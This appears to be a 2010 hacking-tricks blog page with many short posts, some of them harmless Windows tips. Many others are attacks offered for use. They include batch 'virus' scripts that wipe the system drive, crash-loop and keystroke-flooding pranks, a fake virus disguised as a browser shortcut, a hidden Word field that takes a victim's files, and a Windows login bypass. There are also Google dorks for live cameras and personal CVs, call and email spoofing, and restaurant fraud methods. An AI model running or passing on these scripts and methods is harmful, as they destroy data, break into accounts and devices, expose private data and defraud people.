Saturday, 30 October 2010

How to Remove Recycle Bin Icon in Windows XP:

0 comments

If you Want to Remove Your Recycle bin icon From Desktop



If using XP ProGo to START > RUN

Type GPEDIT.MSC

Navagate to USER CONFIGURATION >ADMINISTRATIVE TEMPLATES >Click on DESKTOP,

On the right hand pane find ” Remove Recycle Bin icon on the desktop ” , double left click on it to ENABLE it.

Sorted!

If using XP Home

Create or modify the following registry entry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel

{645FF040-5081-101B-9F08-00AA002F954E}
REG_DWORD
0×00000001

If you like the post, please do comment and link
this post through bookmarking sites. You can use share this link by clicking on the icons below.


Read More ->>

How to Hack Rapidshare.com:

0 comments


Since I started blogging the question that has been asked by maximum number of users via Comments, Web Forms or via Communities is “How to hack Rapidshare.com?”. Rapidshare is one of the best file hosting service in the world. You can upload, Download files that you want very easily. But if you are not a premium user of Rapidshare then while downloading any file from the rapidshare, you will get annoying download time before getting the download link.
Today I am posting the answer to your most asked question via a very simple trick which will help you to reset the download waiting time to zero. So you can download your files very quickly.


Follow the steps given below and hack Rapidshare.com yourself:
1. Goto the Rapidshare URL of the file you want to Download.



2. Now click on the Free User button. Your waiting time will be start.



3. Now remove the current URL and copy the follwing code in the Browser’s address bar;
 


4. Hit Enter.

5. This code will set your download timer as zero and download link will be appear immediately.

6. Click Download. If it gives some error message, refresh the page once and download will start.

You could also add the following link to bookmarklets and use it whenever you want to circumvent Rapidshare Wait Time.
Read More ->>

Saturday, 23 October 2010

Call Spoofing 2011:

0 comments

In this post we will talk about a basic and effective way of call spoofing. But for the beginners let me clear what do you mean by call spoofing.

Call spoofing is a technique to call anyone from any number. You can call your friend from his/her Dad’s number if we consider it as a example. So before proceeding to the hack-tutorial whatever you can call it. Today there is no method free of cost that can help you to spoof a call. So, dont waste your time while asking to Google Search about it.
Here is a technique that mostly being used to spoof a call. Just follow the following steps:


1. Open http://www.crazycall.net

2. Select your country and wait for the page to load.

3. Enter the number you want to display in the first big box (Don’t change the contents of small box if the fake number is of same country).

4. Enter the number you wish to call in second big box.

5. Choose voice pitch as normal (for same voice) or high or low pitch to change your voice.

6. Click Get me a code.

7. Dial the number shown on right and enter the shown code when asked.

Note:-Please  Remember International call rates apply. and yes the post is just for education purpose only that how call spoofing can be performed.I appeal  my users to not to misuse the given information.


 
Read More ->>

Email Spoofing 2010:

0 comments

Hey today i am going to tell you what is email spoofing. Email spoofing refers to send fake email with fake ID. This is common activity these days. This is done to fool people to give out personal information like credit card number. Sometimes we receive an email from bank. Which looks authenticate  to you but sometimes it can be an email spoofing attack. Earlier this attack was done by an telnet by SMTP servers, but now this technique is not working. So i decided to show you how to spoof  email with an website and a tool.

So first i show how to spoof email with an website.

So the steps are:
1:) First go to www.emkei.cz

2:) Then fill all the information required.

3:) Then check your email

By this way you have send an fake email  using email spoofing technique.
This can also be done by using a tool. To download that tool click here

Just open that tool and follow the on screen instructions and enjoy……….. BUT THIS FILE MAY BE WARNED BY ANTIVIRUS BECAUSE IT IS A HACKING SOFTWARE.


Read More ->>

Facebook Virus:

0 comments

In this tutorial I will show you how to make a  Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer .

1) Open notepad
2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ..........."




3)Save as Internet Explorer .bat



4)Right click on Internet Explorer .bat and click Create Shortcut



5)Right click on shorcut and click Properties.



6)Click Change Icon



7) Choose Internet Explorer icon or similar , click OK , then click Apply



8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:





After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !


Read More ->>

Friday, 22 October 2010

Shake The Firefox and Internet Explorer:

0 comments

Copy & Pase Below Java Script To your Browser's Address Bar n See Magic...

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

PASTE ABOVE CODE IN ADDRESS BAR AND SEE THE SHAKE


Read More ->>

Sunday, 17 October 2010

List of Free VPN For Anonymous Internet Browsing:

0 comments

      There may be many reasons why you want to use a VPN, just bypass your local school internet filtering, the Great firewall of China of the blocking of Hulu and other online TV websites to non US IPs, whatever your choice, you have now available some free VPN to do that.

      Some of the free VPNs, like Anchorfree, are financed through advertisement, this means you will have to view a small banner while surfing the internet, but other than this it works fine.


      Other of the free VPN have time, bandwith and data download restrictions, and most of them, if not all, will not allow you to use Bit torrent through the VPN, you will need a paid solution for this.

List of free VPN for anonymous internet surfing
No logs premium VPN 

If you need a realiable premium no logs VPN provider that will get around internet filters and provide you with secure and anonymous internet browsing, try Invisible Browsing VPN.


Read More ->>

Friday, 15 October 2010

Hack into Windows Xp without changing the password:

1 comments



Steps to hack into a windows XP computer without changing the password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

2. Download DreamPackPL HERE.

3. You’ll get DREAMPACK.iso.

4. Use any burning program that can burn any ISO images.

5. After you have the disk, boot from the CD or DVD drive. You will see Windows2000 setup and it will load some files.

6. Press “R” to install DreamPackPL.

7. Press “C” to install DreamPackPL by using the recovery console.

8. Select the Windows installation that is currently on the computer (normally it will be “1” if you only have one windows installed).

9. Backup your original sfcfiles.dll by typing the following:
ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld

10. Copy the hacked file from CD to system32 folder. Type the following:
copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll(here I have mentioned my default drive as D)

11. Type “Exit”, take out the disk and reboot.

12. In the password field, type “dreamon” and the DreamPack menu will appear.

13. Click on the top graphic on the DreamPack menu and you will get a popup menu.



14. Go to commands and enable the options and enable the god command.



15. Type “god” in the password field to get in Windows.

You can also go to passwords and choose “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: Some Antivirus may block DreamPackPL. Its because that most of the antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.


Read More ->>

Increase ur RAM and so ur System Speed:

0 comments

1). Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.


5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM. In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM. 


Read More ->>

Thursday, 14 October 2010

Play with Google Images:

1 comments

Go to Code:1. http://www.google.com

2. Click "images"

3. Fill in "bikes, flowers, cars" or any other word.

4. You will get a page with alot of images thumbnailed.

5. Now delete the URL on the addressbar (example:

PHP Code:
http://images.google.nl/images?hl=nl&q=flowers&btnG=Afbeeldingen+zoeken&gbv=2 


6. Copy the script down here, and paste it in your adressbar !

Quote:


And see the magic.



Read More ->>

Saturday, 9 October 2010

XP Hack: Hack Windows XP administrator account.:

2 comments

This is small but very useful XP hacking tutorial which is emphasized on the method used to change/hack Windows XP administrator password if you don`t have access to admin account(student account).

Just follow the steps given below.

Steps:
1. Start–>Run–>lusrmgr.msc and press Enter or OK.
2. Than there`s two folders: Users & Groups. You need Users, than in this folder right click on Administrator–>Set New Password !
So, you are now able to hack in any Windows XP administrator account even when it is password protected. Just follow the hack and you will be able to bypass/hack password, infact change administrator account password.

Enjoy HaCkInG…..

For More Tricks Visit: TP's Hack World
Read More ->>

Friday, 8 October 2010

Mobile Hacking:: How to fool your friends when they call by saying “The Number Does not VALID” :

0 comments

Today i am going to show you How can we fool our friends when they call to our mobile by saying the message “The   Number Doesnot VALID” or some other message based on your service provider.
Some times we don’t want to talk with a particular person so is there any way to avoid those Friends? May be you do this Tricks i,e  Switch off our mobile number  or Just giving some one to talk when they call and some other But this tricks all can be guessed by him. So what to do to avoid him?
So, Today i am going to give you one best Trick to avoid him by saying “The Number Doesnot VALID” when ever they call.
Steps to make to get message “The Number Doesnot VALID” whenever they call :
  • This tricks is possible only for mobile users : )
  • Go to Call Divert option and Divert call to your Friend number to the whom you want to avoid.
For ex:If you want to avoid a person with +91944xxxxxx7 then divert Divert Call to +91944xxxxxx7
  • Then see the magic whenever they call they get an error announcement saying “The Number Doesnot VALID”
  • Note: Don’t forget to cancel Call Divert after cheating him otherwise all your incoming call goes to him and outgoing charges apply for you whenever they receive your call.

For More Tricks Visit: TP's Hack World
Read More ->>

Thursday, 7 October 2010

Make Simple Virus in .bat:

0 comments

use these scripts on your own responsibility..

1.This Virus Deletes All The Content Of A Drive...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y

Save It As Anything.bat

3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
save as anyname.bat

For More Tricks Visit: TP's Hack World
Read More ->>

Social Engineering Techniques & Attack Examples:

0 comments

During a penetration test on the physical security of an organization, if social engineering is used,
the penetration tester directly interacts with the employees. These interactions are usually based on deception and if not done properly can upset the employees, violate their privacy or damage their trust towards the organization, leading to law suits and loss of productivity of the organization.

METHOD-1: Below is step by step method.
This method consists of four different characters

Security officer - an employee responsible for the security of the organization. The security officer orchestrates the penetration test.
Custodian - an employee who owns the assets, sets up and monitors the penetration test.
Penetration tester - This is the person who will perform SOCIAL ENGINEERING ATTACK.
Employee - person in the organization who has none of the roles above.




Below Tricks you can use If you are really hungry.

METHOD-2: You can go into a self-service cafeteria and finish the meal of someone who left a lot on the plate. Self-service restaurants are usually good places to cop things like mustard, ketchup, salt, sugar, toilet paper, silverware and cups for home use. Bring an empty school bag and load up after you've cased the joint. Also, if you can stomach the food, you can use slugs at the automat. Finishing leftovers can be worked in even the fanciest of restaurants. When you are seated at a place where the dishes still remain, chow-down real quick. Then after the waitress hands you the menu, say you have to meet someone outside first, and leave.

METHOD-3: In fancy sit-down restaurants, you can order a large meal and halfway through the main course, take a little dead cockroach or a piece of glass out of your pocket and place it deftly on the plate. Jump up astonished and summon the headwaiter. "Never have I been so insulted. I could have been poisoned" you scream slapping down the napkin. You can refuse to pay and leave, or let the waiter talk you into having a brand new meal on the house for this terrible inconvenience.

NOTE: In all these methods, you should leave a good tip for the waiter or waitress, especially with the roach-in-the-plate gambit. You should try to avoid getting the employees in trouble or screwing them out of a tip.

METHOD-3: One fantastic method of not only getting free food but getting the best available is the following technique that can be used in metropolitan areas. Look in a large magazine shop for gourmet digests and tourist manuals. Swipe one or two and copy down a good name from the masthead inside the cover. Making up a name can also work. Next invest 50/- RS to print business cards with the name of the magazine and the new "associate editor." Call or simply drop into a fancy restaurant, show a copy of the magazine and present the manager with your card. They will insist that the meal be on the house.

In the same manner, you can also perform your attacks.
For More Tricks Visit: TP's Hack World
Read More ->>

Some Cool Notepad Hacks:

0 comments

Hey Friends Welcome back today I am going to share few New Notepad hacks. They are really cool and crazy one's. So Please think atleast three to four times to use them on ur PC.



UNLIMITED NOTEPAD WINDOWS HACK:
This will pop up endless notepads until the computer freezes and crashes. Copy the below code in notepad and save it as ".vbs" extension.

Code:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



CAPS LOCK CRAZY TRICK:
This constantly turns caps lock on and off really fast continuously.

Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


UNLIMITED BACKSPACE HACK:
This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
       

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Convey your friend a message and shut down his / her computer:

 Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files .

For More Tricks Visit: TP's Hack World
Read More ->>

Make Ultra Strong Password:

0 comments

A very good One from Irongeek.
Strong Article Worth Sharin



As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I'm writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:


1. They are unlikely to be in someone's dictionary or brute force list. Try brute forcing a password like "ace of ?s" or "I am the a and the O".
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don't rely on it to keep you 100% safe.

I'll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.


1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password "Oÿ" (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.

Microsoft has the following to say on the subject of ALT+NUM key codes:


From:http://www.microsoft.com/globaldev/reference/glossary.mspx


Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:


• Alt+<xxx>, where xxx is the decimal value of a code point, generates an OEM-encoded character.
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+<+>+<xxxx>, where xxxx is the hexadecimal Unicode code point, generates a Unicode-encoded (UTF-16) character.



Shortly I'll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value "HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad", then set it to "1". Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I'll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.

The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.

The table on the right shows the ANSI character set (AKA: Window's ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I've been in "character encoding hell" just trying to get this article on my site in a readable format.

For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.

some examples :

ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Ã…
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 Æ’
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬

For More Tricks Visit: TP's Hack World
Read More ->>

Microsoft Office Hacks:

0 comments

This article is just to make u aware of knowm existing threats
only for educational purpose.



I have stumbled onto a couple potential security issue in Microsoft
Word blogs i would like to share. In both cases the adversary (mis)uses
fields to perpetrate the attack. It's important to note that fields are not macros and, as far
as I know, cannot be disabled by the user. I am providing a basic
description along with a proof-of-concept demo. I am fairly certain
that someone with free time and imagination can expand on these
principles, possibly applying them to other products.

Following tradition I'll use Hacker and Victim as the two parties involved.
Hacker will be the adversary.


1) Document collaboration spyware.



Attack Basics: Hacker sends Victim a Word document for revisions. After Victim
edits, saves, and mails it back to Hacker the file will also include
contents of another file(s) from Victim's computer that Hacker has
specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field
into the document. The field results in inclusion of a specified file
into the current document. Of course, Hacker must be careful include it
in such a way that it does not become apparent to Victim. Hacker can do all
the usual things like hidden text, small white font, etc. Alternatively
(and in my opinion cleaner, she can embed the INCLUDETEXT field within
a dummy IF field that always returns an empty string. In this case, the
only way Victim can notice the included file is if he goes browsing
through field codes.


Attack Improvements: The disadvantage of the basic attack is that Hacker
must rely on Victim to update the INCLUDETEXT field to import the file. If
the document is large and contains tables of contents, figures, etc.
then Victim is very likely to update all the fields. However, Hacker would
like to make sure that the field gets updated regardless of whether Victim
does it manually or not. Automatic updates can be forced if a DATE
field is embedded into the INCLUDETEXT and it is the last date field in
the document (don't ask me why).


Proof of concept: Inserting the following field structure into the
footer of the last page will steal the contents of c:a.txt on the
target's computer. Keep in mind the plain curly braces below must
actually be replaced with Word field braces (you can either use the
menus to insert fields one by one, or ask google how to do it by hand).


{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }


Countermeasures: The only thing you can do now is decide how paranoid
you want to be. If you must edit and send out a Word file with unknown
origins, you may want to manually go through the fields. It would be
nice to be able to force user confirmation (via a dialog box) for all
includes. Alternatively one could write a scanner. Of course an optional
standalone checker will never be used by those most at risk.


2) Oblivious signing



Attack Basics: Hacker and Victim wants to sign a contract saying that Hacker
will pay Victim $100. Hacker types it up as a Word document and both
digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that
states he owes her $100. Hacker also has a valid signature from Victim for
the new document. In fact, it is the exact same signature as for the
contract Victim remembers signing and, to Victim's great amazement, the two
Word documents are actually identical in hex. What Hacker did was insert
an IF field that branched on an external input such as date or
filename. Thus even though the sign contents remained the same, the
displayed contents changed because they were partially dependent on
unsigned inputs. The basic point is that very few users know the actual
contents of their Word documents and it should be obvious that one
should never sign what one cannot read. Of course, Victim could contest
the contract in court. An expert witness (that's actually an expert)
could easily demonstrate that there are unsigned inputs and therefore
it is not clear which version was actually signed. Thus Victim can get out
of the fraudulent contract. However, the same logic will hold for Hacker
and she gets away without paying Victim $100 she signed for. Thus, an
adversary can build in a free escape clause. Note that I am just
speculating about all the legal aspects.


Proof of concept: Inserting the following field structure at the tail
of the document will cause "Hello" to be displayed if the filename is
"a.doc" and "Bye" otherwise.


{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }


Update : this flaw has been fixed in office 2003 onwards
but still works in office 2000 and even sometimes in 2002/03


__________________________________________________________________________

We can
consistently crash Word 2000 using the following method:


1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar

This consistenly crashes Word 2000 with the following error
message:

DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The
memory could not be "read".





Vulnerability:

remove office passwords
Vulnerable:

MS Word (Win2K/XP)



Example 1

1) Open MS Word with a new/blank page

2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc

3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...



Example 2

1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)

2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)

3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)

4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password

Change password if ya like & or save in whatever format if ya like ...

For More Tricks Visit: TP's Hack World
Read More ->>

Make Ur PDF Files to Speak:

0 comments


Here R the Shortcuts for Hearing pdf files in Adobe Reder 6.0 or Higher

ctrl+shift+b ---->to hear the whole topic
ctrl+shift+v ---->to hear the page

For More Tricks Visit: TP's Hack World
Read More ->>

Tuesday, 5 October 2010

How to Trace Any IP Address?:

0 comments

ipmap how to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com.


Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.
1. Country in which the IP is located
2. Region
3. City
4. Latitude/Longitude
5. Zip Code
6. Time Zone
7. Name of the ISP
8. Internet Speed
9. Weather Station
10. Area Code and
11. Domain name associated with the IP address.
A sample snapshot of the results from ip2location.com is given below
ip2location_results
You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.

For More Tricks Visit: TP's Hack World
Read More ->>

How to Detect Anonymous IP Addresses?:

0 comments

Detect-ProxyAs the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.

1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.
2. Bypass Website Country Restrictions
Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.

Proxy Detection Services

So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.
How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.
Detect Anonymous Proxy
So for all those who think that they can escape by using a spoofed IP, this post is the answer. I hope this information helps. Pass your comments.

For More Tricks Visit: TP's Hack World
Read More ->>

Hack BSNL Broadband for Speed:

0 comments


If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:

  • 208.67.222.222
  • 208.67.220.220
Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

For More Tricks Visit: TP"s Hack World
Read More ->>

Monday, 4 October 2010

How to Hack Orkut Account?:

0 comments

How to Hack Orkut AccountGoogle uses a 4 Level Orkut login which makes it difficult to hack Orkut using brute force attack. Hence it’s almost impossible to use the brute force approach to hack Orkut account. Before we discuss how to hack Orkut lets take a look into the 4 level secure login feature of Orkut account.

First Level - Security-SSL or 128 bit secured connection
Second Level - Orkut account checks for cookie in the sytem of user
Third Level - Orkut provides a redirection to the entered User information
Fourth Level - Orkut doesn’t use conventional php/aspx/asp coding. So it is impossible to hack Orkut using input validation attack!!!
It is not an easy task to hack Orkut by breaking this security! However still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to protect your Orkut account being hacked.

Ways to Hack Orkut Account

1. Using Keyloggers is one of the Easiest Way to Hack Orkut password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an Orkut account.
A keylogger program is widely available on the Internet. Some of the best ones are listed below

SniperSpy
A detailed information on Keylogger Hack can be found in my post Hacking an Email Account.
2. Phishing Attack is the most popular way of hacking/stealing other’s password. This attact works by using fake login pages to fool innocent Orkut users to enter their Orkut username and password in these fake login pages instead of the real ones. When the users land on these page they enter their Orkut username and password thinking it to be the real page but actually it is other way round. It submits all the entered details to the creator of the fake login page. In this way it’s obvious for many people to lose their Orkut account password.
3. Orkut New Features: Some sites on internet may claim to offer many additional features for Orkut users. Also these sites will offer a login page from their own website and force users to login to their Orkut account from this page itself inorder to gain access to the additional features. In fact these sites are acam and they take away your password when you enter your Orkut username and password on their pages. This is similar to that of phishing attack.
4. Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.
5. Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it. So be careful, javascripts can even be used to hack Orkut!
6. Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’. This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.
So a better thing would be to keep a very unknown or useless email ID of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker. Hence your Orkut account saved.
So, I hope that this post not only teaches you to hack Orkut account but also to hack protect your Orkut account.

For More Tricks Visit: TP's Hack World
Read More ->>

How to use Google for Hacking?:

0 comments

Google serves almost 80 percent of all search queries on the Internet, proving itself as the most popular search engine. However Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post I will show how to use Google for exploiting security vulnerabilities within websites. The following are some of the hacks that can be accomplished using Google.

1. Hacking Security Cameras

There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time. All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. You will see something as follows

As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. So to access them just use the following search query.
intitle:”Live View / – AXIS”
Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

2. Hacking Personal and Confidential Documents

Using Google it is possible to gain access to an email repository containing CV of hundreds of people which were created when applying for their jobs. The documents containing their Address, Phone, DOB, Education, Work experience etc. can be found just in seconds.
intitle:”curriculum vitae” “phone * * *” “address *” “e-mail”
